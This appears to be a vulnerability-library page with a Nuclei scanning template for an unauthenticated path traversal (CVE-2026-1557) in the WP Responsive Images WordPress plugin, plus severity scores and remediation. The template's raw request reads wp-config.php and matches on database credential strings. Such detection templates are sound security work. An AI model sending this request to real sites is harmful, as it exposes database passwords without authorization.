/Vulnerability Library

WP Responsive Images <= 1.0 - Arbitrary File Read

CVE-2026-1557
Verified

Description

WP Responsive Images plugin for WordPress <= 1.0 contains a path traversal caused by improper sanitization of the 'src' parameter, letting unauthenticated attackers read arbitrary files on the server.

Severity

High

CVSS Score

7.5

Exploit Probability

29%

Published Date

March 12, 2026

Template Author

shivam kamboj

CVE-2026-1557.yaml
id: CVE-2026-1557

info:
  name: WP Responsive Images <= 1.0 - Arbitrary File Read
  author: Shivam Kamboj
  severity: high
  description: |
    WP Responsive Images plugin for WordPress <= 1.0 contains a path traversal caused by improper sanitization of the 'src' parameter, letting unauthenticated attackers read arbitrary files on the server.
  impact: |
    nauthenticated attackers can read arbitrary files, potentially exposing sensitive information.
  remediation: |
    Update to the latest version of WP Responsive Images plugin.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-responsive-images/wp-responsive-images-10-unauthenticated-path-traversal-to-arbitrary-file-read-via-src
    - https://nvd.nist.gov/vuln/detail/CVE-2026-1557
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-1557
    epss-score: 0.2889
    epss-percentile: 0.96628
  metadata:
    max-request: 1
    verified: true
  tags: cve,cve2026,wordpress,wp,wp-plugin,lfi,wp-responsive-images,vkev

http:
  - raw:
      - |
        GET /wp-content/plugins/wp-responsive-images/image_handler.php?src=/wp-config.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code==200 || status_code==403'
          - 'contains_all(body, "DB_NAME", "DB_PASSWORD")'
        condition: and
# digest: 490a00463044022077d8d34985f3ec7ae85649cb394ea7167b3356136c357e42da249cfeca1ed68802202679005076923bbb2be23ada94b42955aae7ee29f23dd100d892660cff0fcf6a:922c64590222798bb761d5b6d8e72950
7.5Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
cve-2026-1557

References

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-responsive-images/wp-responsive-images-10-unauthenticated-path-traversal-to-arbitrary-file-read-via-srchttps://nvd.nist.gov/vuln/detail/CVE-2026-1557

Remediation Steps

Update to the latest version of WP Responsive Images plugin.